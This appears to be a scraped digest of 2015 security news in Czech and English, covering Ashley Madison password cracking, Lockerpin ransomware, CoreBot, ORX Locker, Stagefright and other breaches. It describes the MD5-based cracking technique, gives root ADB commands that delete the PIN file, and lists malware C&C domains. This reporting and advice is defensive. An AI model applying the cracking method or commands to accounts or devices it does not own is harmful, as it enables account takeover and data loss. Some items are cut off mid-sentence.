Nebylo těžké zjistit, že tento MD5 hash se skládá z uživatelského jména převedeného na malá písmena, dvou dvojteček a hesla, taktéž převedeného na malá písmena. Poněvadž uživatelské jméno se ví, dvojtečky není problém přilepit, zkouší se tedy jen brutální silou kombinace všech možných hesel. Díky tomu, že jde o MD5 hash, dá se toto provést extrémně rychle. Poté, co vypadne heslo, vyzkouší se šifrování získaného hesla pomocí bcryptu. Pokud výsledek sedí s tím v databázi, heslo je rozlousknuto. Pokud nesedí, je patrné, že bylo převedeno na malá písmena a zkouší se různé kombinace malých a velkých písmen již rozlousknutého slova. U hesla s 8 písmeny je to celkově 2^8, tedy 256 kombinací (místo "heslo" se zkusí třeba "Heslo" nebo "HESLO". To není nezvládnutelné.

Nicméně v praxi toto nebylo v podstatě potřeba, neboť 90 % uživatelů mělo hesla se všemi malými písmeny, a tak tuto operaci bylo nutno provést jen u 10 % případů. Takto rozlouskli přes 11 milionů hesel z celkově 15,26 milionů. Přibližně 240 tisíc se jim rozlousknout nepodařilo, žádná kombinace získaného hesla se neshodovala s výsledkem bcryptu v databázi. Zde je možné, že MD5 v databázi bylo pozůstatkem a všechna nová hesla a jejich změny se už ukládaly pomocí bcryptu. Uživatel, který si změnil heslo, tak v databázi možná mohl mít staré heslo zahashované pomocí MD5, které se už neaktualizovalo a nové heslo bylo uloženo jen v bcryptu. Toto je ale jen spekulace.

Prolomení těchto 11 milionů hesel zabralo okolo 10 dní, takže počátkem příštího týdne by mělo být rozlousknuto všech 15 milionů hesel zašifrovaných nedostatečnou metodou MD5. Dalších přes 20 milionů účtů už využívalo pouze bcrypt a nemělo by být možné je v rozumné době prolomit. Skupina CynoSure Prime nemá v zájmu tato hesla zveřejňovat, jen chce demonstrovat, jak jednoduché bylo tuto ochranu prolomit. Připomeňme, že přítomnost na Ashley Madison není pro člověka ničím lichotivým, protože napovídá, že měl nějaký milostný poměr. Ostatně kvůli zveřejnění těchto citlivých informací si už minimálně jeden člověk vzal život.

These Top 30 Ashley Madison Passwords are just as Terrible as You'd Think


Yes, you heard it correct!

First the Password Cracking Team 'CynoSure Prime' cracked more than 11 Million Ashley Madison’s passwords in just 10 days (quite an achievement, though), now a member of the team shares the same list of passwords with few calculations.

The calculations are...

...What passwords are mostly used and by how many users? Terrible?

Out of 11 million passwords, only 4.6 million passwords were unique, and the rest were such weak and horrible ones that one could even think.

ArsTechnica to whom CynoSure Prime updated the news published the calculations and say that this is expected to change as they still left with 3.7 million passwords to decrypt.

While going through the list of password, top 5 used were:
123456 by 120511 users
12345 by 48452 users
password by 39448 users
DEFAULT by 34275 users
123456789 by 26620 users
for more see the list of passwords in above image.
AND, Even a 5th grader can literally guess these Passwords!

Apple Boosts iOS 9 Security with improved Two-Factor Authentication


Apple iOS 9, codenamed Monarch, will be available to the world on September 16th.
While most of the upgrades on iOS 9 focus on making devices:
and more efficient.
Today we are going to discuss the improved Two-Factor Authentication (2FA) pumped within the new iOS operating system.
Apple has strengthened the foundation of iOS 9 and further of your device by modifying the operating system with an improved two-factor authentication built into it.
As the two-factor authentication structure lies within the operating system, this makes the device's Apple ID even harder to break.
2FA secures your Apple ID by acting as an additional support to protect your data on your device, preventing any intrusion to occur on your device.
Also, when you have more than one devices running Apple’s operating system, 2FA enables sign-in on a new device in a streamlined manner…
...Besides verifying your identity by entering your password Apple will generate a six-digit verification code in the next step that is either displayed on your Apple device through which you are logging in or you can choose to get it through a SMS or via phone call.
Things to pay attention to:
Remember your password and set up a device passcode on all your devices.
Remember to keep your devices secure from any external threat like theft.
Remember to update your trusted devices on time.
All of this makes it easier for you and difficult for the intruder to gain access to your information.
We’ve been saying improved and robust 2FA comes with iOS 9, yes, it has improved and follows a different method of verifying you and building trust.
If you are an iOS user and want to get the know hows about your device's security follow the Apple support explaining the same.
Apple ID is your identity on Apple's various services including iCloud, Apple Pay and many more.
The enhanced security features built into iOS 9 help you keep your Apple devices as well as Apple ID safe by:
Strengthening the Passcode that protects your devices
Improving Two-Factor Authentication that is built directly into iOS
These features make it harder for hackers, intruders or others to "gain unauthorized access to your Apple ID," said Apple.
After being victims of attacks in the past like 'Snappening' and 'Fappening' as well as threats like iOS zero-day exploits are able to capture user's password can be counted as few examples that support the new two-factor authentication.
Moreover, iOS 9 boasts of various improved features like battery optimization, several built-in apps and enhanced security for all the devices.
Apple also claimed that it is the most intelligent of the lot by providing you Proactive assistance Siri. The all new Proactive feature will offer contextual users suggestions based on their habits, location, or time of day.
As already mentioned, iOS 9 will be available to public from September 16 onwards. The operating system comes as a free update for all the users of iPhone 4s and later, iPod touch 5th generation and above, iPad 2 and above and iPad mini and later.

iOS 9 boosts iPhone 6s and iPad Pro security with improved 2FA


The latest edition of Apple’s mobile operating system comes with enhanced security features, the company has announced.
Available from September 16th on the iPhone, iPad and iPod, iOS 9 offers users even greater protection from a variety of threats, and ensures that personal information and sensitive data remains secure.
Stronger passcode and improved 2FA offers exceptional protection

After the iCloud scandal from last year, which saw attackers leak nude photos of celebrities, Apple has been eager to restore its security credibility.
Two key developments will offer users even greater reassurance that this is the case. This includes a stronger passcode and a revamped two-factor authentication process (2FA).
By building the latter directly into the operating system, the tech giant has made it markedly more difficult for attackers “to gain unauthorized access” to a user’s Apple ID.
2FA is a supplementary security feature. For example, it ensures that devices remain secure even after a cybercriminal has managed to get hold of a password – another process is still required to gain access.
“Your Apple ID is the key to many things you do with Apple,” the company has explained.
“Two-step verification is a feature you can use to keep your Apple ID and personal information as secure as possible.”
Game-changing iPad Pro has Touch ID tech for added security

Apple Pencil IPad Pro
The iOS update was announced at Apple’s latest and highly anticipated Keynote event in San Francisco, which saw the tech giant also announce the latest edition to the iPad family, the iPad Pro.
Now the largest device in the series (it has a 12.9-inch display), the hi-tech iPad Pro comes with Touch ID technology to help keep the device safe and secure.
According to Apple, this helps to transform “your fingerprint into an unforgettable password”, meaning that when this feature is activated, it cannot be unlocked by anyone else.
Apple backs privacy of its users

Against the backdrop of the Keynote event, Apple has hit the headlines over its commitment to protecting user data.
The New York Times reported that the tech giant is unwilling to bow down to government pressure to hand over personal information sent via iMessage.
“In an investigation involving guns and drugs, the Justice Department obtained a court order this summer demanding that Apple turn over, in real time, text messages between suspects using iPhones,” the news provider outlined.
In response, Apple said that it was unable to do this because its messaging service is encrypted – it cannot “comply” with this request.
Simply put, due to the unique design of iMessage – and FaceTime – it is impossible for Apple to make sense of the data that is being sent between devices.
Further, as it states online, this is something that it is keen to avoid. Apple wants this information to remain private:
“Your communications are protected by end-to-end encryption across all your devices when you use iMessage and FaceTime, and with iOS 9 and Watch OS, your iMessages are also encrypted on your device in such a way that they can’t be accessed without your passcode.
“Apple has no way to decrypt iMessage and FaceTime data when it’s in transit between devices.”

Aggressive Android ransomware spreading in the USA


We have been following the evolution and mass spreading of Android ransomware for a while now. After seeing early ransomware families combining fake antivirus with the ability to lock the devices screen (Android Defender, for example), last year we discovered Simplocker, the first Android ransomware to actually encrypt user files. This time, ESET researchers have discovered the first known Android lock-screen-type ransomware spreading in the wild that sets the phone’s PIN lock.
In previous Android LockScreen Trojans, the screen-locking functionality was usually achieved by constantly bringing the ransom window to the foreground in an infinite loop. While various self-defense mechanisms were implemented to keep the device user locked out, it wasn’t too difficult to get rid of the malware thus unlocking the device by using Android Debug Bridge (ADB) or deactivating Administrator rights and uninstalling the malicious application in Safe Mode.
Unfortunately, malware writers have stepped up their game, and with the new Android ransom-lockers, detected by ESET as Android/Lockerpin.A, users have no effective way of regaining access to their device without root privileges or without some other form of security management solution installed, apart from a factory reset that would also delete all their data.
Moreover, this ransomware also uses a nasty trick to obtain and preserve Device Administrator privileges so as to prevent uninstallation. This is the first case in which we have observed this aggressive method in Android malware.

After a successful installation, the malware tries to obtain Device Administrator privileges. This trick is being used by Android malware authors more and more, as it makes it more difficult to remove the infection. Earlier versions of this Android/Locker family do this in just the same way as all other Android Trojans – they rely on the user willingly activating the elevated privileges.
In the latest versions, however, the Trojan obtains Device Administrator rights much more covertly. The activation window is overlaid with the Trojan’s malicious window pretending to be an “Update patch installation”. As the victims click through this innocuous-looking installation they also unknowingly activate the Device Administrator privileges in the hidden underlying window.

Figure 1: Hidden device administrator activation
21Figure 1: Hidden device administrator activation
After clicking on the button, the user’s device is doomed: the Trojan app has obtained Administrator rights silently and now can lock device — and even worse, it set a new PIN for the lock screen.
Not long after, the user will be prompted to pay a $US500 ransom for allegedly viewing and harboring forbidden pornographic material.

After this bogus alert is displayed, the screen is locked, in typical Android Trojan lockscreen fashion. The user may now uninstall Android/Lockerpin.A either by going into Safe Mode or using Android Debug Bridge (ADB). However, after any ransom activity the PIN will be reset and neither the owner nor the attacker can unlock the device, because the PIN is generated randomly and it’s also not sent to the attacker. The only practical way to unlock is to reset to factory defaults – if device is not rooted.
Figure 3: PIN lock screen

Figure 3: PIN lock screen
The device is now permanently locked and it’s impossible to unlock it without root privileges.
Locker self–defense

Not only does Android/Lockerpin.A acquire Device Admin privileges in a novel and covert manner, it also uses an aggressive self-defense mechanism to make sure it keeps them. When users attempt to deactivate Device Admin for the malware, they will fail because the Trojan will have registered a call-back function to reactivate the privileges when removal is attempted.
Similarly to when Device Administrator is first activated by the Trojan, if a removal attempt is made the Device Administrator window is again overlaid with a bogus window as shown in Figure 4. Pressing Continue effectively reactivates the elevated privileges.
Figure 4: Overlapping activity

Figure 4: Overlapping activity
As an extra layer of self-protection, the ransomware also attempts to kill running AV processes when the user tries to deactivate its Device Admin rights. The Trojan tries to protect itself from three mobile anti-virus applications: ESET Mobile Security and also Android solutions by Avast and Dr.Web.
Figure 5: Killing running processes

Figure 5: Killing running processes
Watching out for – this is an attempt to prevent standard uninstallation through Android’s built in application manager.
Luckily, with our own self-protection mechanisms in place, the malware will not succeed in killing or removing ESET Mobile Security.
Distribution vector and prevalence statistics

This Trojan uses social engineering techniques to trick the users into installing it. This Ransomware pretends to be an adult video, an app for viewing adult/porn videos. In all cases that we have observed, the application calls itself “Porn Droid”.
Based on ESET’s LiveGrid® statistics, most of the infected Android devices are in the USA, with a percentage share of over 75 per cent. This is part of a trend where Android malware writers are shifting from mostly targeting Russian and Ukrainian users to largely targeting victims in America, where arguably they can make bigger profits.

Ransomware_USAUnlocking the device

The only way to remove the PIN lock screen without a factory reset is when device is rooted or has a MDM solution capable of resetting the PIN installed. If the device is rooted then the user can connect to the device by ADB and remove the file where the PIN is stored. For this to work, the device needs to have debugging enabled otherwise it’s not possible (Settings -> Developer options -> USB Debugging). User can use the following set of commands to unlock the device:
> adb shell
> su
> rm /data/system/password.key
After running the above commands, the PIN or password lock screen will be removed and the user can get to the device. In some cases, a device reboot is needed.

Fortunately, you can’t download this application from the official Google Play Store. This Trojan can be delivered to users from third party markets, warez forums or torrents. The most effective way to avoid getting infected and being locked out from your device is by proactive preventative measures. We strongly advise users to keep their Antivirus software up-to-date. ESET Mobile Security detects this threat as Android/Lockerpin.A.

LockerPin Ransomware Resets PIN and Permanently Locks Your SmartPhones


Your device's lock screen PIN is believed to keep your phone's contents safe from others, but sadly not from a new piece of ransomware that is capable of hijacking safety of your Android devices.

A group of security researchers has uncovered what is believed to be the first real example of malware that is capable to reset the PIN code on a device and permanently lock the owner out of their own smartphone or tablet.

This Android PIN-locking ransomware, identified as Android/Lockerpin.A, changes the infected device's lock screen PIN code and leaves victims with a locked mobile screen, demanding for a $500 (€450) ransom.

Here's the Kicker:

Since the lock screen PIN is reset randomly, so even paying the ransom amount won't give you back your device access, because even the attackers don't know the changed PIN code of your device, security researchers at Bratislava-based antivirus firm ESET warn.

LockerPIN, as dubbed by the researchers, being spread through an adult entertainment apps installed from third-party websites, warez forums, and torrents – outside of the official Google Play Store.

The app in question is Porn Droid, which is the second of its kind observed recently called Adult Player – another porn-themed Android app that takes selfies of its users and include them in its ransom messages.

How LockerPIN Works?

Once installed on the victim's smartphone, the app first tricks users into granting it device administrator rights. It does so by disguising itself as an "Update patch installation" window.

After gaining admin privileges, the malicious app goes on to change the user's lock screen PIN code, using a randomly generated number.

LockerPin Ransomware Resets PIN and Permanently Locks Your SmartPhones
This random number is not even sent to the attacker, meaning even after victims pay the ransom; nobody can unlock the device's screen.

Though the majority of infected devices are detected within the United States, the researchers have spotted the infections worldwide.

How to Get Rid of this LockerPIN Ransomware?

Unfortunately, there is "no effective way" to regain access to infected devices without losing personal data.

Rebooting the device in Safe Mode and uninstalling the offending application or using Android Debug Bridge (ADB) alone won't solve the issue.

The only way to unlock the device and get rid of LockerPIN ransomware app is to perform a factory reset that would wipe out all the personal data and apps stored on your device.

Ransomware delivering through malicious apps are growing increasingly and becoming more sophisticated with time, and this newly discovered LockerPIN Ransomware proves the theory.

The bottom line:

To avoid falling victims to malicious apps like Porn Droid and Adult Player, the saving grace for users is:
Don't install apps outside of the Google Play Store.
Don't grant administrator privileges to apps unless you truly trust them.



UPnP – písmena, označující sadu síťových protokolů, představují slova Universal Plug and Play. Kromě toho ale také skrývají nebezpečí pro vaši síť, pokud máte zapnutou podporu UPnP na vašem routeru.

Jak vyplývá z varování, které vydal CERT při Carnegie Mellon univerzitě, většina zařízení si generuje nedostatečně náhodné identifikátory, které jsou využívány při UPnP komunikaci. Útočník je tedy může odhadnout a pomocí UPnP protokolu na routeru otevřít porty či provádět jiné akce, které může jinak dělat jen správce routeru. Tím si otevře cestu do celé vaší domácí sítě.

Ukázka provedení Filet-O-Firewall útoku během několika málo vteřin

Využití této zranitelnosti v kombinaci s dalšími útoky umožňuje vytvořit škodlivou webovou stránku. Pokud ji oběť navštíví z prohlížeče Chrome nebo Firefox a má povolený javascript, okamžitě se odešlou UPnP požadavky na její router a otevřou se tak vrátka do sítě oběti. Celá tato kombinace útoků byla nazvána Filet-O-Firewall a má už i svou stránku, která mimo jiné obsahuje detaily útoku a seznam zranitelných routerů.

Vinu za toto nebezpečí lze do jisté míry svalovat na výrobce, kteří UPnP protokol používají. Ten totiž sám o sobě nepodporuje žádnou formu autentizace a předpokládá, že autentizační mechanizmy budou implementovány v samotném zařízení. V naprosté většině případů tomu tak ale není a zařízení jsou zranitelná. Chcete-li se bránit, doporučujeme alespoň do doby, než výrobci vydají opravy, na zařízení podporu UPnP vypnout.

SleepyPuppy - nástroj od Netflixu provádí důkladné hledání XSS

Doporučit vám, abyste k hledání XSS zranitelnosti použili nástroj „Ospalé štěňátko“, to nezní moc bezpečně. Pravdou ale je, že štěně čmuchá, zatímco vy můžete v klidu spát. Jeho hlavní výhodou je totiž schopnost odhalovat takzvané zpožděné XSS zranitelnosti v sekundárních aplikacích. Ty se mohou ukázat ve chvíli, kdy jedna webová aplikace zpracuje vstup od uživatele a uloží ho do databáze, ze které další webová aplikace stejná data načte a zobrazí.

Princip funkce nástroje SleepyPuppy pro odhalení zpožděných XSS zranitelností

Při využití SleepyPuppy se do vstupních dat vloží skript, který při existující XSS odešle na server zprávu o zranitelnosti s mnoha detaily. Mezi nimi je URL adresa, referrer, screenshot, cookie, user-agent a objektový model dokumentu (DOM).

Ukázka záznamu o XSS zranitelnosti

Pokud chcete, můžete při nalezení chyby obdržet také email s těmito informacemi. K tomu může dojít klidně týdny nebo měsíce po zahájení testování. Pokud máte chuť si s tímhle štěňátkem pohrát, jeho zdrojové kódy jsou k dispozici na GitHubu.

CoreBot - nový malware zaměřený zejména na krádeže přihlašovacích údajů

Modulární architektura není záležitostí jen velkých aplikací. Jak uvádí report od expertů z IBM Security X-Force, nový malware CoreBot ji také úspěšně využívá. Díky tomu do něj mohou být jednoduše přidávány nové mechanizmy pro krádeže dat a ovládání napadených počítačů.

Malware CoreBot nejprve využije k instalaci dropper, který spustí proces svchost, aby zapsal soubory mallwaru na disk a poté je spustí. Následně si CoreBot vygeneruje unikátní ID, které uloží do registru pro zajištění spuštění po startu systému. Je tedy možné najít například tento záznam: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\f9111abc-8f81-200b-8b4a-bd8fd4a43b8h

Následně se CoreBot připojí k C&C serveru, odkud stahuje své pluginy a dostává příkazy. Adresa C&C serveru se liší podle lokality napadeného stroje. Aktuálně CoreBot odesílá komunikaci na dvě domény (vincenzo-sorelli[.]com a arijoputane[.]com), které jsou obě registrované na stejného vlastníka s ruskou adresou.

Odtud stahuje zatím nejvyužívanější plugin pojmenovaný Stealer. Ten slouží pro krádeže uložených hesel ze všech aktuálně populárních internetových prohlížečů. Dále také hledá data z velkého počtu FTP a e-mailových klientů, webmailů, peněženek na kryptoměny, soukromé certifikáty a osobní data z různých desktopových aplikací.

Antivirové řešení zatím nerozpoznávají tento malware přímo jako CoreBot, ale detekovat ho dokáží. Nejčastěji jsou jeho nálezy označovány jmény jako Dynamer!ac nebo Eldorado.

KeyRaider vykrádá z jailbreaknutých iPhonů certifikáty, klíče a loginy

Majitelé Apple zařízení se systémem iOS, kteří se rozhodli provést jailbreak, mohou být napadeni novou rodinou malwaru KeyRaider. Ten je součástí některých nástrojů pro provedení jaibreaku. Nalezen byl například na jednom z největších čínských portálů pro fanoušky Applu Weiphone, konkrétně v repozitáři Cydia. A bohužel je úspěšný, již kompromitoval více než 225 000 účtů Apple.

KeyRider se zaměřuje na krádeže Apple účtů, diky nimž mohou útočníci následně stahovat placené aplikace. Podle blogu společnosti Palo Alto Networks ale malware také shromažďuje certifikáty a privátní klíče z napadených zařízení. V některých případech také malware telefon zamkl a po majiteli bylo vyžadováno výkupné.

Zpráva vyzývající ke kontaktování útočníků za účelem odemknutí telefonu

Analytikům, kteří malware KeyRider zkoumají, se podařilo dostat na C&C server a získat přístup k databázi, kde bylo 225 941 kradených loginů. Mezi e-mailovými adresami uživatelských účtů byly i adresy s cz doménou.

Kybernetickým kriminálníkem jednoduše, díky službě ORX Locker

Možností, jak si nelegálně přivydělat na internetu, je určitě spousty. Většinou tyto možnosti ale nebudou pro každého, na rozdíl od nové služby ORX Locker, díky které by si dokázala přivydělat i vaše babička.

Jedná se o další službu nabízející ransomware-as-a-service. O pravděpodobně první službě tohoto druhu, pojmenované Tox, jsme psali v červnu. Oproti Toxu nabízí ORX Locker sofistikované metody skrývání se před detekcí antivirovými programy a využívá komplexní infrastrukturu pro svou komunikaci, zahrnující servery univerzit a přenosy přes TOR.

Ukázka platformy pro tvorbu ransomwaru

K vytvoření ransomwaru se stačí na stránce zaregistrovat, není potřeba žádný e-mail či osobní údaje. Dokonce je možné si přivydělat i lákáním dalších zákazníků a pomocí referral programu obdržet 3 % z každé platby, kterou získají.

Pro stažení exe souboru s virem je potřeba zadat unikátní ID a výši výkupného. Následně kliknete na Build EXE a už můžete rozesílat program svým obětem. Ty budou mít po zašifrování dat 96 hodin na zaplacení.

Návod k platbě, který oběť najde v html souboru na své ploše

Uživatel může na stránkách služby přehledně sledovat, kolik počítačů se mu podařilo infikovat, kdy a kolik souborů bylo zašifrováno a jaký zisk mu jednotlivé oběti přinesly. Tyto prostředky pak může ze služby ORX Locker vybrat přesunem do zadané bitcoinové peněženky. Podobně, tedy co se týká omezení se pouze na Bitcoiny, je tomu i u plateb výkupného.

Here's How to Stop Windows 7 or 8 from Downloading Windows 10 Automatically


installation files — between 3.5GB and 6GB — onto users' PCs even if they have not opted into the upgrade.
Microsoft plans to deploy Windows 10 on over 1 Billion devices worldwide, and this auto-downloading Windows 10 could be one of its many strategies to achieve its goal.
The company has dropped and saved a hidden $Windows.~BT folder on your PC's main drive (C drive), if you are running Windows 7 or Windows 8.1.
The bottom line is:
Many Windows users are on limited or metered Internet connections. As Microsoft is not only consuming storage space but also using user's Internet bandwidth for large unrequested files, as the Windows 10 installer downloads up to 6 gigabytes.
So, here are some methods that you can use to stop Microsoft from automatically downloading Windows 10 installation files.
Method 1
Here's How to Stop Windows 7 or 8 from Downloading Windows 10 Automatically
This method is applicable for both Windows 7 and Windows 8.1 users and specifically targets the Windows 10 download files.
Install KB3065987 (for Windows 7) or KB3065988 (for Windows 8.1) updates from Microsoft's official website, depending on the operating system you are using
Now restart your computer and open up the registry editor (search Regedit)
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Right-click "Windows", and Select New, then Key and then Type "WindowsUpdate"
Click on the newly created "WindowsUpdate" key and create a 32-bit DWORD called "DisableOSUpgrade" with a value of 1.
Restart your computer. That's it.
Method 2
Both Windows 7 and Windows 8.1 users can simply choose to disable downloading of all Windows updates.
For this you need to follow some simple steps:
Go to Windows Update
Click on Change settings
Select "Check for updates but let me choose whether to download and install them"
Once selected, Windows Update will notify you of updates, and you have to manually choose to install each and every update.
Method 3
The third method is only for Windows 8.1 users. Windows 8.1 has a setting for metered connections, but it only works for Wi‑Fi and mobile broadband networks, not for users connected with Ethernet cables.
Click on the networks icon in the bottom right
Right-click the connection you are using
Choose "Set as metered connection"
The other way is to:
Type "PC settings" into the Start Screen
Select Network
Select Connections
Now choose the connection you want to change
Turn on "Set as a metered connection" under Data usage
Either way, Windows Update will not download large updates over this connection anymore.

Microsoft is Auto-Downloading Windows 10 to PCs, Even If You Don't Want it


Microsoft wholeheartedly wants you to upgrade to Windows 10. So much that even if you have not opted-in for Windows 10 upgrade, you will get it the other way.


If you have Windows Update enabled on your PCs running Windows 7 or Windows 8.1, you’ll notice a large file — between 3.5GB and 6GB — mysteriously been downloaded to your computer in the background.

The huge file is actually linked to Windows 10 installation that Microsoft is reportedly downloading on Windows 7 and Windows 8.1 computers even if users have not opted into the upgrade.

The news comes days after it was disclosed that Microsoft is installing Windows 10’s data collecting and user behavior tracking features onto Windows 7 and 8.1 machines.

With this latest automatic Windows 10 installation, Microsoft is not only consuming your storage space but also using your Internet bandwidth for unrequested files, as the Windows 10 installer downloads up to 6 gigabytes, depending on which Windows version you are using.

According to the latest report published by the Inquirer, a number of users running Windows 7 or 8.1 complained that a large folder called ‘$Windows.~BT’ has been dropped in their system that tries to install Windows 10 every time they boot up their PCs.

Here’s the Kicker:

Microsoft, which released its newest Windows 10 operating system earlier this summer, admitted that it was downloading the unwanted files on users’ computers.

The Redmond technology firm said in a statement:
"For individuals who have chosen to receive automatic updates through Windows Update, we help upgradable devices get ready for Windows 10 by downloading the files they’ll need if they decide to upgrade."
Now, this is insane.

Microsoft mentioned many times that it plans to deploy Windows 10 on over 1 Billion devices worldwide, but the upgrading users' computers even without their awareness is a bad practice.

Moreover, the practice is problematic for users with slow or metered Internet connections.

Check If Microsoft is Downloading Windows 10 without Your Awareness:
Open and Check the drive Windows is installed on.
Look for the folder $Windows.~BT (it is hidden folder so enable the option to view hidden files)
If exists, Windows installation files have already been downloaded without your permission



Researchers recently discovered a smattering of vulnerabilities in web applications and mobile applications belonging to companies like Yahoo, PayPal, Magento, and Shopify that could have led to account theft, session hijacking, and phishing, among other consequences.

Hadji Samir, Ebrahim Hegazy, Ayoub Ait Elmokhtar, and Benjamin Kunz Mejri, researchers with Vulnerability Lab, found the bugs earlier this year but only recently disclosed them.
The researchers found three separate issues in web apps developed by PayPal, including a severe vulnerability that could have let an attacker bypass a verification check meant to approve the account owner. Mejri discovered that even if two factor authentication was enabled on the app, if a user attempted to login with the wrong credentials and got blocked, they could still get into their account. In a writeup on the vulnerability last week Mejri said that a user could access another user’s account via the mobile API simply by swapping out expired cookies for legitimate ones.

On top of the two factor authentication bypass bug, PayPal also recently patched an open redirect web vulnerability, discovered by Elmokhtar, that could’ve been exploited remotely. It also addressed a stored cross-site scripting vulnerability in its Online Service Web Application back in August, found by Hegazy, that could’ve been exploited to purchase goods or transfer funds.

Another issue the researchers brought up existed in Gemini, Yahoo’s marketplace for mobile and native ads. If exploited the Cross Site Request Forgery (CSRF) bug could have enabled an attacker to inject malicious code to compromise client-side app to browser requests, along with session data.

Lastly the researchers disclosed two different persistent file name vulnerabilities in two e-commerce platforms, one in the eBay-owned Magento, and one in Shopify.

Both vulnerabilities, since fixed, could have let a remote attacker upload their own malicious files to the application-sides of the service modules. If compromised, they could lead to a handful of issues for both apps, including session hijacking, persistent phishing attacks, persistent redirects to external malicious sources, and more.

It’s the seventh bug in Magento that Samir has dug up this year. In June he came across three issues, a CSRF vulnerability, a XSS bug, and a different persistent filename vulnerability in the company’s e-commerce platform.

Ironically the most recent vulnerability Samir found was in the module on Magento’s site in charge of reporting bugs. Instead of reporting a bug, if an attacker wanted to upload a file with a payload script code as a filename via POST, the payload code would execute.

Snadnější správu bezpečnostních řešení přináší Eset

11.9.2015 Zabezpečení
Servisní verzi produktu Remote Administrator 6 určeného pro vzdálenou správu nainstalovaných bezpečnostních řešení Esetu vydal jejich výrobce.

Nástroj má řadu nových funkcí a vylepšení, přičemž jednou z hlavních novinek je možnost použití dvoufaktorové autentizace pro přístup do webové konzole.

Vedle zavedení dvoufaktorové autentizace pro přihlášení do konzole jsou nejdůležitějšími novými funkcemi Remote Administratoru nový průvodce prvotním nastavením, podpora nové verze Mail Security 6 pro Microsoft Exchange Server, nativní prohlížeč protokolů SysInspector nebo migrační nástroj pro přenos politik z minulých verzí.

Mezi vylepšeními je například i vylepšená správa hrozeb, All-in-one instalátor, který disponuje více možnostmi pro instalaci a odinstalaci nebo řada vylepšení uživatelského prostředí webové konzole. Ta je také celkově rychlejší a má kratší odezvu.

„Dvoufaktorové zabezpečení webové konzole Remote Administrator umožňuje zdarma chránit uživatelské účty až deseti administrátorů. Jde o volitelnou funkci, která významně posiluje celkovou IT bezpečnost v organizaci,“ dodává Michal Jankech, produktový manažer společnosti Esetu.

Android Stagefright Exploit Code Released


Zimperium Mobile Security Labs (zLabs) have been working hard to make Android operating system more safe and secure to use.

Zimperium team has publicly released the CVE-2015-1538 Stagefright Exploit, demonstrating the process of Remote Code Execution (RCE) by an attacker.

The released exploit is a python code creating an MP4 exploiting the ‘stsc’ vulnerability dubbed Stagefright.

The purpose behind the release is to put penetration testers and security researchers to test and check the vulnerability of the code and analyze the results.

Considered as the most critical flaw among all the existing vulnerabilities; the Stagefright flaw is capable of revealing user's information remotely by injecting malicious code, even without any involvements of the user.

Two months ago, Zimperium Labs uncovered multiple vulnerabilities in ‘libstagefright,’ a service attached with the software-based codecs natively in Android smartphones for media playback.

The vulnerability allowed booby-trapped MP4 videos that supplied variables with 64-bit lengths to overflow the buffer and crash the smartphone when trying to open that multimedia message.

The list of vulnerabilities extend to:
CVE-2015-1538, P0006, Google Stagefright ‘stsc’ MP4 Atom Integer Overflow Remote Code Execution
CVE-2015-1538, P0004, Google Stagefright ‘ctts’ MP4 Atom Integer Overflow Remote Code Execution
CVE-2015-1538, P0004, Google Stagefright ‘stts’ MP4 Atom Integer Overflow Remote Code Execution
CVE-2015-1538, P0004, Google Stagefright ‘stss’ MP4 Atom Integer Overflow Remote Code Execution
CVE-2015-1539, P0007, Google Stagefright ‘esds’ MP4 Atom Integer Underflow Remote Code Execution
CVE-2015-3827, P0008, Google Stagefright ‘covr’ MP4 Atom Integer Underflow Remote Code Execution
CVE-2015-3826, P0009, Google Stagefright 3GPP Metadata Buffer Overread
CVE-2015-3828, P0010, Google Stagefright 3GPP Integer Underflow Remote Code Execution
CVE-2015-3824, P0011, Google Stagefright ‘tx3g’ MP4 Atom Integer Overflow Remote Code Execution
CVE-2015-3829, P0012, Google Stagefright ‘covr’ MP4 Atom Integer Overflow Remote Code Execution
The vulnerability was affecting Android operating system version 2.2 (Froyo) and before version 5.1.1_r9 (Lollipop).

To access the exploit go to (raw file) explaining the conditions that come along and everything you need to know.

To know further, visit US-CERT/CC advisory where they posted the details regarding the announcement.

Health Insurer Excellus Hacked; 10.5 Million Records Breached


Health Care Hacks — the choice of hackers this year!

In a delayed revelation made by Excellus BlueCross BlueShield (BCBS), which says that about 10.5 Millions of their clients' data and information has been compromised by hackers.

Excellus BCBS headquartered in Rochester, New York, provides finance and health care services across upstate New York and long-term care insurance nationwide.

On August 5, 2015, Excellus BCBS discovered that the hackers targeted their IT systems back in December 2013, initiating a sophisticated attack to gain access to their systems and record client's personal data.

The Compromised Data includes:
Social Security Number (SSN)
Date of birth
Mailing address
Telephone number
Member identification number
Financial account information
Claims information
Did they forget something?...It seems everything is gone!

Moreover, it's been two years Excellus systems were open to the hackers. So, what the company was doing all this time?

Excellus BlueCross BlueShield in their statement said:
"This incident also affected members of other Blue Cross Blue Shield plans who sought treatment in the 31 county upstate New York service area of Excellus BCBS. Individuals who do business with us and provided us with their financial account information or Social Security number are also affected."
The company has hired Mandiant Incident Response Team of FireEye Inc to help investigate the matter and to bring its systems back to normal by providing adequate remediation solutions.

Though the investigation has gathered no such evidence relating to removal of data, use or misuse of the compromised data.

Further, To save customers valuable data, the company showed concerns for the affected customers and said that they are going to:
Mail letters to its customers to let them know the facts and how they can in future secure their identity.
Offer cover of two years of free identity theft protection services and credit monitoring to affected individuals.
Moreover, for others, who are worried regarding their security can contact Excellus on 1-877-589-3331 (Toll-free) to know about the incident.

At the start of this year, Cyber attacks victims in health care were:
Anthem Healthcare with data breach of 80 million (the largest of all)
Premera with approximately 11 millions of users personal data being stolen
UCLA Health System with 4.5 millions of data leaks leading to identity theft
CareFirst with affecting 1.1 million (approx) customers
All the above companies were using BlueCross BlueShield insurance plans except UCLA health system.

Also, we need to think that for what purpose the hackers are going to use this bulk information...or is it the calm before the storm?

If we notice, vendors running BCBS plans are the ones mostly affected by this data breach.

So is the BCBS Association the target of the hackers? That one after the other its vendors offering insurance services are being victims of such massive data breaches.

This indeed makes us think of the potential of not only the cyber attacks and security but also the current threats to health care and associated bio-medical devices.

Hacker Demonstrated Untethered iOS 9 Jailbreak On Video


Just within 24 Hours after the launch of iOS 9 at Apple's Annual Event, a well-known iOS hacker has managed to untether jailbreak iOS 9. That's quite impressive.

Believe it, iOS 9 has been Jailbroken!

A reputed hacker 'iH8sn0w', who previously developed the popular jailbreak tools like Sn0wbreeze and P0sixspwn, published a new YouTube video last night, demonstrating the first untethered jailbreak for the yet-unreleased iOS 9.

